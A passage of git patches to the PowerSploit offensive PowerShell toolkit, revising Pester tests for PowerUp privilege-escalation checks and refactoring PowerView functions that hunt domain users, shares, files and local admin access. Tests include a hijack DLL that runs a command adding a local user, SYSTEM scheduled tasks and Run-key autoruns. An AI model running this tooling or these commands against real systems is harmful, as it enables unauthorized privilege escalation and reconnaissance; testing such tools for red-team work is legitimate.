-        {Invoke-FileFinder -ComputerFile ".\targets.txt"} | Should Not Throw
+    try {
+        It "Should accept -ComputerFile argument" {
+            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt        
+            {Invoke-FileFinder -ComputerFile ".\targets.txt"} | Should Not Throw
+        }
+    }
+    finally {
         Remove-Item -Force ".\targets.txt"
     }
-    It "Should accept -ShareList argument" {
-        "\\$($env:computername)\\IPC$" | Out-File -Encoding ASCII shares.txt
-        {Invoke-FileFinder -ShareList ".\shares.txt"} | Should Not Throw
+    try {
+        It "Should accept -ShareList argument" {
+            "\\$($env:computername)\\IPC$" | Out-File -Encoding ASCII shares.txt
+            {Invoke-FileFinder -ShareList ".\shares.txt"} | Should Not Throw
+        }
+    }
+    finally {
         Remove-Item -Force ".\shares.txt"
     }
     It "Should accept -Terms argument" {
@@ -609,16 +621,17 @@ Describe "Find-LocalAdminAccess" {
             Throw "Insuffient results returned"
         }
     }
-    It "Should accept -ComputerFile argument" {
-        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
-        if ( (Find-LocalAdminAccess -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
-            Remove-Item -Force ".\targets.txt"
-            Throw "Insuffient results returned"
-        }
-        else {
-            Remove-Item -Force ".\targets.txt"
+    try {
+        It "Should accept -ComputerFile argument" {
+            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            if ( (Find-LocalAdminAccess -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
+                Throw "Insuffient results returned"
+            }
         }
     }
+    finally {
+        Remove-Item -Force ".\targets.txt"
+    }
     It "Should accept -NoPing argument" {
         if ( (Find-LocalAdminAccess -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
@@ -643,16 +656,17 @@ Describe "Invoke-EnumerateLocalAdmin" {
             Throw "Insuffient results returned"
         }
     }
-    It "Should accept -ComputerFile argument" {
-        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
-        if ( (Invoke-EnumerateLocalAdmin -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
-            Remove-Item -Force ".\targets.txt"
-            Throw "Insuffient results returned"
-        }
-        else {
-            Remove-Item -Force ".\targets.txt"
+    try {
+        It "Should accept -ComputerFile argument" {
+            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            if ( (Invoke-EnumerateLocalAdmin -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
+                Throw "Insuffient results returned"
+            }
         }
     }
+    finally {
+        Remove-Item -Force ".\targets.txt"
+    }
     It "Should accept -NoPing argument" {
         if ( (Invoke-EnumerateLocalAdmin -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
-- 
cgit v1.2.3


From e2993b63aaf09026a11dc3ba2f0ae4a364f27113 Mon Sep 17 00:00:00 2001
From: Harmj0y <will@harmj0y.net>
Date: Mon, 14 Dec 2015 18:19:17 -0500
Subject: Modified Tests/Privesc.tests.ps1 to ensure file artifacts are not
 left on disk.

---
 Tests/Privesc.tests.ps1 | 165 ++++++++++++++++++++++++++++++------------------
 1 file changed, 103 insertions(+), 62 deletions(-)

(limited to 'Tests')

diff --git a/Tests/Privesc.tests.ps1 b/Tests/Privesc.tests.ps1
index d1461d5..6593c84 100644
--- a/Tests/Privesc.tests.ps1
+++ b/Tests/Privesc.tests.ps1
@@ -31,10 +31,13 @@ Describe 'Get-ModifiableFile' {
         $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
         $Null | Out-File -FilePath $FilePath -Force
 
-        $Output = Get-ModifiableFile -Path $FilePath
-        $Output | Should Be $FilePath
-
-        Remove-Item -Path $FilePath -Force
+        try {
+            $Output = Get-ModifiableFile -Path $FilePath
+            $Output | Should Be $FilePath
+        }
+        finally {
+            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue
+        }
     }
 
     It 'Should extract a modifiable file specified as an argument in a command string.' {
@@ -43,10 +46,13 @@ Describe 'Get-ModifiableFile' {
 
         $CmdPath = "'C:\Windows\System32\nonexistent.exe' -i '$FilePath'"
         
-        $Output = Get-ModifiableFile -Path $FilePath
-        $Output | Should Be $FilePath
-
-        Remove-Item -Path $FilePath -Force
+        try {
+            $Output = Get-ModifiableFile -Path $FilePath
+            $Output | Should Be $FilePath
+        }
+        finally {
+            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue
+        }
     }
 
     It 'Should return no results for a non-existent path.' {
@@ -59,7 +65,7 @@ Describe 'Get-ModifiableFile' {
     It 'Should accept a Path over the pipeline.' {
         $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
 
-        $Output = Get-ModifiableFile -Path $FilePath
+        $Output = $FilePath | Get-ModifiableFile
         $Output | Should BeNullOrEmpty
     }
 }
@@ -114,19 +120,23 @@ Describe 'Get-ServiceFilePermission' {
     }
 
     It 'Should return a service with a modifiable service binary.' {
-        $ServiceName = Get-RandomName
-        $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe"
-        $Null | Out-File -FilePath $ServicePath -Force
-
-        sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS"
-
-        $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName }
-        sc.exe delete $ServiceName | Should Match "SUCCESS"
-        Remove-Item -Path $ServicePath -Force
-
-        $Output | Should Not BeNullOrEmpty
-        $Output.ServiceName | Should Be $ServiceName
-        $Output.Path | Should Be $ServicePath
+        try {
+            $ServiceName = Get-RandomName
+            $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe"
+            $Null | Out-File -FilePath $ServicePath -Force
+
+            sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS"
+
+            $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName }
+            sc.exe delete $ServiceName | Should Match "SUCCESS"
+            
+            $Output | Should Not BeNullOrEmpty
+            $Output.ServiceName | Should Be $ServiceName
+            $Output.Path | Should Be $ServicePath
+        }
+        finally {
+            $Null = Remove-Item -Path $ServicePath -Force
+        }
     }
 
     It 'Should not return a service with a non-existent service binary.' {
@@ -138,7 +148,7 @@ Describe 'Get-ServiceFilePermission' {
         $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName }
         sc.exe delete $ServiceName | Should Match "SUCCESS"
 
-        $Output | Should BeNullOrEmpty        
+        $Output | Should BeNullOrEmpty
     }
 }
 
@@ -167,6 +177,11 @@ Describe 'Get-ServiceDetail' {
         $Output = Get-ServiceDetail -ServiceName NonExistent123
         $Output | Should BeNullOrEmpty
     }
+
+    It 'Should accept a service name on the pipeline.' {
+        $Output = "Dhcp" | Get-ServiceDetail
+        $Output | Should Not BeNullOrEmpty
+    }
 }
 
 
@@ -247,14 +262,18 @@ Describe 'Install-ServiceBinary' {
     }
 
     AfterEach {
-        $Null = Invoke-ServiceStop -ServiceName PowerUpService
-        $Null = sc.exe delete "PowerUpService"
-        $Null = $(net user john /delete >$Null 2>&1)
-        if(Test-Path "$(Get-Location)\powerup.exe") {
-            Remove-Item -Path "$(Get-Location)\powerup.exe" -Force
+        try {
+            $Null = Invoke-ServiceStop -ServiceName PowerUpService
+            $Null = sc.exe delete "PowerUpService"
+            $Null = $(net user john /delete >$Null 2>&1)
         }
-        if(Test-Path "$(Get-Location)\powerup.exe.bak") {
-            Remove-Item -Path "$(Get-Location)\powerup.exe.bak" -Force
+        finally {
+            if(Test-Path "$(Get-Location)\powerup.exe") {
+                $Null = Remove-Item -Path "$(Get-Location)\powerup.exe" -Force -ErrorAction SilentlyContinue
+            }
+            if(Test-Path "$(Get-Location)\powerup.exe.bak") {
+                $Null = Remove-Item -Path "$(Get-Location)\powerup.exe.bak" -Force -ErrorAction SilentlyContinue
+            }
         }
     }
 
@@ -348,12 +367,18 @@ Describe 'Find-PathHijack' {
 
         New-Item -Path C:\PowerUpTest\ -ItemType directory -Force
 
-        $OldPath = $Env:PATH
-        $Env:PATH += ';C:\PowerUpTest\'
+        try {
+            $OldPath = $Env:PATH
+            $Env:PATH += ';C:\PowerUpTest\'
+
+            $Output = Find-PathHijack | Where-Object {$_.HijackablePath -like "*PowerUpTest*"}
 
-        $Output = Find-PathHijack | Where-Object {$_.HijackablePath -like "*PowerUpTest*"}
-        $Env:PATH = $OldPath
-        $Output.HijackablePath | Should Be 'C:\PowerUpTest\'
+            $Env:PATH = $OldPath
+            $Output.HijackablePath | Should Be 'C:\PowerUpTest\'
+        }
+        catch {
+            $Null = Remove-Item -Recurse -Force 'C:\PowerUpTest\' -ErrorAction SilentlyContinue
+        }
     }
 }
 
@@ -362,12 +387,16 @@ Describe 'Write-HijackDll' {
 
     It 'Should write a .dll that executes a custom command.' {
 
-        Write-HijackDll -OutputFile "$(Get-Location)\powerup.dll" -Command "net user testing Password123! /add"
-        
-        "$(Get-Location)\powerup.dll" | Should Exist
-        "$(Get-Location)\debug.bat" | Should Exist
-        Remove-Item -Path "$(Get-Location)\powerup.dll" -Force
-        Remove-Item -Path "$(Get-Location)\debug.bat" -Force
+        try {
+            Write-HijackDll -OutputFile "$(Get-Location)\powerup.dll" -Command "net user testing Password123! /add"
+            
+            "$(Get-Location)\powerup.dll" | Should Exist
+            "$(Get-Location)\debug.bat" | Should Exist
+        }
+        finally {
+            $Null = Remove-Item -Path "$(Get-Location)\powerup.dll" -Force -ErrorAction SilentlyContinue
+            $Null = Remove-Item -Path "$(Get-Location)\debug.bat" -Force -ErrorAction SilentlyContinue
+        }
     }
 }
 
@@ -397,16 +426,20 @@ Describe 'Get-VulnAutoRun' {
         {Get-VulnAutoRun} | Should Not Throw
     }
     It 'Should find a vulnerable autorun.' {
-        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
-        $Null | Out-File -FilePath $FilePath -Force
-        Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp -Value "vuln.exe -i '$FilePath'"
+        try {
+            $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+            $Null | Out-File -FilePath $FilePath -Force
+            $Null = Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp -Value "vuln.exe -i '$FilePath'"
 
-        $Output = Get-VulnAutoRun | ?{$_.Path -like "*$FilePath*"}
+            $Output = Get-VulnAutoRun | ?{$_.Path -like "*$FilePath*"}
 
-        Remove-Item -Path $FilePath -Force
-        $Null = Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp
-        
-        $Output.ModifiableFile | Should Be $FilePath
+            $Null = Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp
+            
+            $Output.ModifiableFile | Should Be $FilePath
+        }
+        finally {
+            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue
+        }
     }    
 }
 
@@ -424,16 +457,20 @@ Describe 'Get-VulnSchTask' {
 
     It 'Should find a vulnerable config file for a binary specified in a schtask.' {
 
-        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
-        $Null | Out-File -FilePath $FilePath -Force
-
-        $Null = schtasks.exe /create /tn PowerUp /tr "vuln.exe -i '$FilePath'" /sc onstart /ru System /f
+        try {
+            $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+            $Null | Out-File -FilePath $FilePath -Force
 
-        $Output = Get-VulnSchTask | Where-Object {$_.TaskName -eq 'PowerUp'}
-        $Null = schtasks.exe /delete /tn PowerUp /f
-        Remove-Item -Path $FilePath -Force
+            $Null = schtasks.exe /create /tn PowerUp /tr "vuln.exe -i '$FilePath'" /sc onstart /ru System /f
 
-        $Output.TaskFilePath | Should Be $FilePath
+            $Output = Get-VulnSchTask | Where-Object {$_.TaskName -eq 'PowerUp'}
+            $Null = schtasks.exe /delete /tn PowerUp /f
+            
+            $Output.TaskFilePath | Should Be $FilePath
+        }
+        finally {
+            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue
+        }
     }
 }
 
@@ -445,11 +482,15 @@ Describe 'Get-UnattendedInstallFile' {
     It 'Should return a leftover autorun' {
         $FilePath = Join-Path $Env:WinDir "\System32\Sysprep\unattend.xml"
 
-        $Null | Out-File -FilePath $FilePath -Force
-        $Output = Get-UnattendedInstallFile
-        $Output | Should Not BeNullOrEmpty
+        try {
+            $Null | Out-File -FilePath $FilePath -Force
+            $Output = Get-UnattendedInstallFile
 
-        Remove-Item -Path $FilePath -Force
+            $Output | Should Not BeNullOrEmpty
+        }
+        finally {
+            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue
+        }
     }
 }
 
@@ -480,6 +521,6 @@ Describe 'Invoke-AllChecks' {
         $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html"
 
         $HtmlReportFile | Should Exist
-        Remove-Item -Path $HtmlReportFile -Force
+        $Null = Remove-Item -Path $HtmlReportFile -Force -ErrorAction SilentlyContinue
     }
 }
-- 
cgit v1.2.3


From 5690b09027b53a5932e42399f6943e03fa32e549 Mon Sep 17 00:00:00 2001
From: Harmj0y <will@harmj0y.net>
Date: Mon, 14 Dec 2015 19:01:10 -0500
Subject: Get-NetDomain now not called if -ComputerName or -ComputerFile are
 passed for meta functions, in order to prevent failure when running on a
 non-domain joined machine took out FQDN Pester tests from Recon.tests.ps1
 that used $env:userdnsdomain

---
 Recon/PowerView.ps1   | 230 ++++++++++++++++++++++++++------------------------
 Tests/Recon.tests.ps1 | 171 +++++++++++--------------------------
 2 files changed, 173 insertions(+), 228 deletions(-)

(limited to 'Tests')

diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1
index 46285f4..57a5789 100644
--- a/Recon/PowerView.ps1
+++ b/Recon/PowerView.ps1
@@ -7914,32 +7914,33 @@ function Invoke-UserHunter {
 
         Write-Verbose "[*] Running Invoke-UserHunter with delay of $Delay"
 
-        if($Domain) {
-            $TargetDomains = @($Domain)
-        }
-        elseif($SearchForest) {
-            # get ALL the domains in the forest to search
-            $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-        }
-        else {
-            # use the local domain
-            $TargetDomains = @( (Get-NetDomain).name )
-        }
-
         #####################################################
         #
         # First we build the host target set
         #
         #####################################################
 
+        if($ComputerFile) {
+            # if we're using a host list, read the targets in and add them to the target list
+            $ComputerName = Get-Content -Path $ComputerFile
+        }
+
         if(!$ComputerName) { 
             [Array]$ComputerName = @()
-            
-            if($ComputerFile) {
-                # if we're using a host list, read the targets in and add them to the target list
-                $ComputerName = Get-Content -Path $ComputerFile
+
+            if($Domain) {
+                $TargetDomains = @($Domain)
+            }
+            elseif($SearchForest) {
+                # get ALL the domains in the forest to search
+                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
             }
-            elseif($Stealth) {
+            else {
+                # use the local domain
+                $TargetDomains = @( (Get-NetDomain).name )
+            }
+            
+            if($Stealth) {
                 Write-Verbose "Stealth mode! Enumerating commonly used servers"
                 Write-Verbose "Stealth source: $StealthSource"
 
@@ -8020,7 +8021,12 @@ function Invoke-UserHunter {
         elseif($UserName) {
             Write-Verbose "[*] Using target user '$UserName'..."
             $User = New-Object PSObject
-            $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
+            if($TargetDomains) {
+                $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
+            }
+            else {
+                $User | Add-Member Noteproperty 'MemberDomain' $Null
+            }
             $User | Add-Member Noteproperty 'MemberName' $UserName.ToLower()
             $TargetUsers = @($User)
         }
@@ -8028,7 +8034,12 @@ function Invoke-UserHunter {
         elseif($UserFile) {
             $TargetUsers = Get-Content -Path $UserFile | ForEach-Object {
                 $User = New-Object PSObject
-                $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
+                if($TargetDomains) {
+                    $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
+                }
+                else {
+                    $User | Add-Member Noteproperty 'MemberDomain' $Null
+                }
                 $User | Add-Member Noteproperty 'MemberName' $_
                 $User
             }  | Where-Object {$_}
@@ -8507,37 +8518,37 @@ function Invoke-ProcessHunter {
 
         Write-Verbose "[*] Running Invoke-ProcessHunter with delay of $Delay"
 
-        if($Domain) {
-            $TargetDomains = @($Domain)
-        }
-        elseif($SearchForest) {
-            # get ALL the domains in the forest to search
-            $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-        }
-        else {
-            # use the local domain
-            $TargetDomains = @( (Get-NetDomain).name )
-        }
-
         #####################################################
         #
         # First we build the host target set
         #
         #####################################################
 
+        # if we're using a host list, read the targets in and add them to the target list
+        if($ComputerFile) {
+            $ComputerName = Get-Content -Path $ComputerFile
+        }
+
         if(!$ComputerName) { 
-            # if we're using a host list, read the targets in and add them to the target list
-            if($ComputerFile) {
-                $ComputerName = Get-Content -Path $ComputerFile
+            [array]$ComputerName = @()
+
+            if($Domain) {
+                $TargetDomains = @($Domain)
+            }
+            elseif($SearchForest) {
+                # get ALL the domains in the forest to search
+                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
             }
             else {
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-                    $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath
-                }
+                # use the local domain
+                $TargetDomains = @( (Get-NetDomain).name )
             }
 
+            ForEach ($Domain in $TargetDomains) {
+                Write-Verbose "[*] Querying domain $Domain for hosts"
+                $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath
+            }
+        
             # remove any null target hosts, uniquify the list and shuffle it
             $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
             if($($ComputerName.Count) -eq 0) {
@@ -9178,7 +9189,13 @@ function Invoke-ShareFinder {
             $ExcludedShares = @('', "ADMIN$", "IPC$", "C$", "PRINT$")
         }
 
+        # if we're using a host file list, read the targets in and add them to the target list
+        if($ComputerFile) {
+            $ComputerName = Get-Content -Path $ComputerFile
+        }
+
         if(!$ComputerName) { 
+            [array]$ComputerName = @()
 
             if($Domain) {
                 $TargetDomains = @($Domain)
@@ -9191,19 +9208,12 @@ function Invoke-ShareFinder {
                 # use the local domain
                 $TargetDomains = @( (Get-NetDomain).name )
             }
-
-            # if we're using a host file list, read the targets in and add them to the target list
-            if($ComputerFile) {
-                $ComputerName = Get-Content -Path $ComputerFile
-            }
-            else {
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-                    $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath
-                }
+                
+            ForEach ($Domain in $TargetDomains) {
+                Write-Verbose "[*] Querying domain $Domain for hosts"
+                $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath
             }
-
+        
             # remove any null target hosts, uniquify the list and shuffle it
             $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
             if($($ComputerName.count) -eq 0) {
@@ -9621,18 +9631,6 @@ function Invoke-FileFinder {
             }
         }
 
-        if($Domain) {
-            $TargetDomains = @($Domain)
-        }
-        elseif($SearchForest) {
-            # get ALL the domains in the forest to search
-            $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-        }
-        else {
-            # use the local domain
-            $TargetDomains = @( (Get-NetDomain).name )
-        }
-
         # if we're hard-passed a set of shares
         if($ShareList) {
             ForEach ($Item in Get-Content -Path $ShareList) {
@@ -9643,34 +9641,51 @@ function Invoke-FileFinder {
                 }
             }
         }
-        if($SearchSYSVOL) {
-            ForEach ($Domain in $TargetDomains) {
-                $DCSearchPath = "\\$Domain\SYSVOL\"
-                Write-Verbose "[*] Adding share search path $DCSearchPath"
-                $Shares += $DCSearchPath
-            }
-            if(!$Terms) {
-                # search for interesting scripts on SYSVOL
-                $Terms = @('.vbs', '.bat', '.ps1')
-            }
-        }
         else {
-            # if we're using a host list, read the targets in and add them to the target list
+            # if we're using a host file list, read the targets in and add them to the target list
             if($ComputerFile) {
                 $ComputerName = Get-Content -Path $ComputerFile
             }
-            else {
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-                    $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
+
+            if(!$ComputerName) {
+
+                if($Domain) {
+                    $TargetDomains = @($Domain)
+                }
+                elseif($SearchForest) {
+                    # get ALL the domains in the forest to search
+                    $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
+                }
+                else {
+                    # use the local domain
+                    $TargetDomains = @( (Get-NetDomain).name )
                 }
-            }
 
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.Count) -eq 0) {
-                throw "No hosts found!"
+                if($SearchSYSVOL) {
+                    ForEach ($Domain in $TargetDomains) {
+                        $DCSearchPath = "\\$Domain\SYSVOL\"
+                        Write-Verbose "[*] Adding share search path $DCSearchPath"
+                        $Shares += $DCSearchPath
+                    }
+                    if(!$Terms) {
+                        # search for interesting scripts on SYSVOL
+                        $Terms = @('.vbs', '.bat', '.ps1')
+                    }
+                }
+                else {
+                    [array]$ComputerName = @()
+
+                    ForEach ($Domain in $TargetDomains) {
+                        Write-Verbose "[*] Querying domain $Domain for hosts"
+                        $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
+                    }
+
+                    # remove any null target hosts, uniquify the list and shuffle it
+                    $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
+                    if($($ComputerName.Count) -eq 0) {
+                        throw "No hosts found!"
+                    }
+                }
             }
         }
 
@@ -9953,8 +9968,15 @@ function Find-LocalAdminAccess {
         $RandNo = New-Object System.Random
 
         Write-Verbose "[*] Running Find-LocalAdminAccess with delay of $Delay"
-        
+
+        # if we're using a host list, read the targets in and add them to the target list
+        if($ComputerFile) {
+            $ComputerName = Get-Content -Path $ComputerFile
+        }
+
         if(!$ComputerName) {
+            [array]$ComputerName = @()
+
             if($Domain) {
                 $TargetDomains = @($Domain)
             }
@@ -9967,18 +9989,11 @@ function Find-LocalAdminAccess {
                 $TargetDomains = @( (Get-NetDomain).name )
             }
 
-            # if we're using a host list, read the targets in and add them to the target list
-            if($ComputerFile) {
-                $ComputerName = Get-Content -Path $ComputerFile
-            }
-            else {
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-                    $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
-                }
+            ForEach ($Domain in $TargetDomains) {
+                Write-Verbose "[*] Querying domain $Domain for hosts"
+                $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
             }
-
+        
             # remove any null target hosts, uniquify the list and shuffle it
             $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
             if($($ComputerName.Count) -eq 0) {
@@ -10521,7 +10536,13 @@ function Invoke-EnumerateLocalAdmin {
 
         Write-Verbose "[*] Running Invoke-EnumerateLocalAdmin with delay of $Delay"
 
+        # if we're using a host list, read the targets in and add them to the target list
+        if($ComputerFile) {
+            $ComputerName = Get-Content -Path $ComputerFile
+        }
+
         if(!$ComputerName) { 
+            [array]$ComputerName = @()
 
             if($Domain) {
                 $TargetDomains = @($Domain)
@@ -10535,18 +10556,11 @@ function Invoke-EnumerateLocalAdmin {
                 $TargetDomains = @( (Get-NetDomain).name )
             }
 
-            # if we're using a host list, read the targets in and add them to the target list
-            if($ComputerFile) {
-                $ComputerName = Get-Content -Path $ComputerFile
-            }
-            else {
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-                    $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
-                }
+            ForEach ($Domain in $TargetDomains) {
+                Write-Verbose "[*] Querying domain $Domain for hosts"
+                $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
             }
-
+            
             # remove any null target hosts, uniquify the list and shuffle it
             $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
             if($($ComputerName.Count) -eq 0) {
diff --git a/Tests/Recon.tests.ps1 b/Tests/Recon.tests.ps1
index 3e6679e..8fd3d75 100644
--- a/Tests/Recon.tests.ps1
+++ b/Tests/Recon.tests.ps1
@@ -163,11 +163,6 @@ Describe "Get-NetLocalGroup" {
     It "Should accept -GroupName argument" {
         {Get-NetLocalGroup -GroupName "Remote Desktop Users"} | Should Not Throw
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-NetLocalGroup -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect local administrators returned"
-        }
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-NetLocalGroup -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect local administrators returned"
@@ -179,7 +174,7 @@ Describe "Get-NetLocalGroup" {
         }
     }
     It "Should accept pipeline input" {
-        if ( ( "$env:computername.$env:userdnsdomain" | Get-NetLocalGroup | Measure-Object).count -lt 1) {
+        if ( ( "$env:computername" | Get-NetLocalGroup | Measure-Object).count -lt 1) {
             Throw "Incorrect local administrators returned"
         }
     }
@@ -192,11 +187,6 @@ Describe "Get-NetShare" {
             Throw "Incorrect share results returned"
         }
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-NetShare -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect local administrators returned"
-        }
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-NetShare -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect local administrators returned"
@@ -208,7 +198,7 @@ Describe "Get-NetShare" {
         }
     }
     It "Should accept pipeline input" {
-        if ( ( "$env:computername.$env:userdnsdomain" | Get-NetShare | Measure-Object).count -lt 1) {
+        if ( ( "$env:computername" | Get-NetShare | Measure-Object).count -lt 1) {
             Throw "Incorrect local administrators returned"
         }
     }
@@ -221,11 +211,6 @@ Describe "Get-NetLoggedon" {
             Throw "Incorrect loggedon results returned"
         }
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-NetLoggedon -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect loggedon results returned"
-        }        
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-NetLoggedon -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect loggedon results returned"
@@ -237,7 +222,7 @@ Describe "Get-NetLoggedon" {
         }        
     }
     It "Should accept pipeline input" {
-        if ( ( "$env:computername.$env:userdnsdomain" | Get-NetLoggedon | Measure-Object).count -lt 1) {
+        if ( ( "$env:computername" | Get-NetLoggedon | Measure-Object).count -lt 1) {
             Throw "Incorrect local administrators returned"
         }
     }
@@ -250,11 +235,6 @@ Describe "Get-NetSession" {
             Throw "Incorrect session results returned"
         }
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-NetSession -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect session results returned"
-        }
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-NetSession -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect session results returned"
@@ -269,7 +249,7 @@ Describe "Get-NetSession" {
         {Get-NetSession -UserName 'Administrator'} | Should Not Throw
     }
     It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Get-NetSession} | Should Not Throw
+        {"$env:computername" | Get-NetSession} | Should Not Throw
     }
 }
 
@@ -280,11 +260,6 @@ Describe "Get-NetRDPSession" {
             Throw "Incorrect session results returned"
         }
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-NetRDPSession -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect session results returned"
-        }
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-NetRDPSession -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect session results returned"
@@ -296,7 +271,7 @@ Describe "Get-NetRDPSession" {
         }
     }
     It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Get-NetRDPSession} | Should Not Throw
+        {"$env:computername" | Get-NetRDPSession} | Should Not Throw
     }
 }
 
@@ -305,9 +280,6 @@ Describe "Invoke-CheckLocalAdminAccess" {
     It "Should Not Throw for localhost" {
